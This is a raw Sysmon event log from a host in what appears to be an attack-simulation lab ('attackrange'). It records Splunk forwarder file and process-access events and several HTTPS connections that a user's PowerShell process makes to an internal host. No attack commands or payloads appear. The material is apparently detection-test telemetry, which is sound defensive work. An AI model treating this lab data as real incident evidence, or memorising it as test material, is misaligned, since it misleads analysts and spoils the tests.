Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=600C436BCC7A018AC99492A975A72AD6,SHA256=784F1029FB0E268E794030DDCEE2F54EF181739CE84B8349C58E938DBD77BADF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083698Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:31.269{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2BB4AF89ECA67BF07B39A7F85E62DEB8,SHA256=DE75BF5BC80A7F414F6E8C7E79C9124F87406740FB15879FC97F1EC5B5793C57,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083701Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:32.899{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FBAD037FB167ACFA128444903B19099,SHA256=B801644D30C9FA295FFF3B0CC624DC1FD3D5AA87058A44A6D4568F6AE282F594,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083702Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:33.914{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE4C1614D5D18A2B67A86FE1FABFE7B9,SHA256=F5BCDF69852D009C3DF1DC7E643C5F5C873D05A1CA584844DE1D6556D239242F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083703Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:34.931{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41655F7B50446B2A6ABC7221EFAEADDC,SHA256=5FBABD652C9D571608E3239966877413BC8109CA53ABC7AE41FEFBA13399B4F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083705Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:35.966{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C085310D422E82AC970C20E0D607461,SHA256=60005216F312F4EA502A0CE19D8573E6563B97E863C6FE4065A1355062960334,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083704Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:35.298{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6DAF7EFE3797FAC1278FE3AFDF093FD3,SHA256=F4F04A081DB7EFC4D018A567097BB19977F1DC4D691EC831ACCCB311E59CD712,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083709Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:36.980{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20CF85C60EDDA62F09281AD52CBDE148,SHA256=08B77BB7C708A2A23308893925AFFE1D02A976E1BA9D3E095F61446E7C19B1C6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083708Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:36.381{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=74BC1775D8FAB9289C035AEA8246A73F,SHA256=9DB9742C0BEAC43DE9E82CDA0BDAE55D442CC018B3BC23325D34010A67C457A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083707Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:00.279{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56507-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035083706Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:00.063{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56506-false10.0.1.12-8000- 23542300x800000000000000035083710Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:38.011{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6871D261F781203DC6AE5147C3B1BAB7,SHA256=BD8E42C427151FD89DA1AAE2BB893187F232D45A65032053170918BB2D901CE8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083711Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:39.032{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99F1EF5334B90F299D8A30A513BFEF36,SHA256=9DBDC5A7DDD80320D0C95B39E10DFC8D82CB6AE12776F65677A6E06F043A78CA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083713Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:40.328{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C5C455FA9706B09C57DEE8444AE4A434,SHA256=07D8D0930D0C4B6EE23E0AA00B2164A8D9479E3610D5D72E56CDF885802E69A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083712Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:40.047{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE717CC6E7647000D06472C21C0655B8,SHA256=B43CD26EEB2C8C756DA1CC9BE3863C03A11080815B138385F93AD7F708465ECA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083714Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:41.062{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9531C1DB06079B46433A031EF0E39F4,SHA256=5F8989E254A6EB2C1A7C785520C8427BDDAAA51FB833FE4D9B05C9CE820A9EC0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083717Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:06.074{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56509-false10.0.1.12-8000- 354300x800000000000000035083716Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:05.291{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56508-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083715Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:42.062{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFEA352F5EBB2A4F3406A93FA5CC1277,SHA256=B2EBF0A4574F3158248AEC549B1BC2657C62639E49E56573380A9CF0CC75A8E9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083727Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:43.928{B81B27B7-4D33-613A-1D90-03000000C801}51321600C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083726Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:43.760{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4D33-613A-1D90-03000000C801}5132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083725Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:43.760{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083724Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:43.760{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083723Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:43.760{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083722Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:43.760{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083721Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:43.760{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4D33-613A-1D90-03000000C801}5132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083720Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:43.760{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4D33-613A-1D90-03000000C801}5132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083719Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:43.745{B81B27B7-4D33-613A-1D90-03000000C801}5132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083718Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:43.108{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7152692B079295EC0DD3885CF9297FE0,SHA256=2E02239507B58A78BCDBF338C9A121CB2D7375BC118F583DDFD369578699F32D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083747Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.944{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4D34-613A-1F90-03000000C801}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083746Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.944{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083745Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.944{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083744Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.944{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083743Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.944{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083742Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.944{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4D34-613A-1F90-03000000C801}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083741Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.929{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4D34-613A-1F90-03000000C801}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083740Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.924{B81B27B7-4D34-613A-1F90-03000000C801}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083739Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.792{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AB551ED9F255E8E15BADDD7F10F97888,SHA256=4BD7151D25D337EAE72D73928876E2D09C7304C427E0749CCA73EC2F90C1CD10,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083738Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.792{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B71CF7AC13338D3FA71F18F6A9B67E12,SHA256=23B3688530B31D1CCB6B39F3F435B0697820D676139835DE462798BC039AC20E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 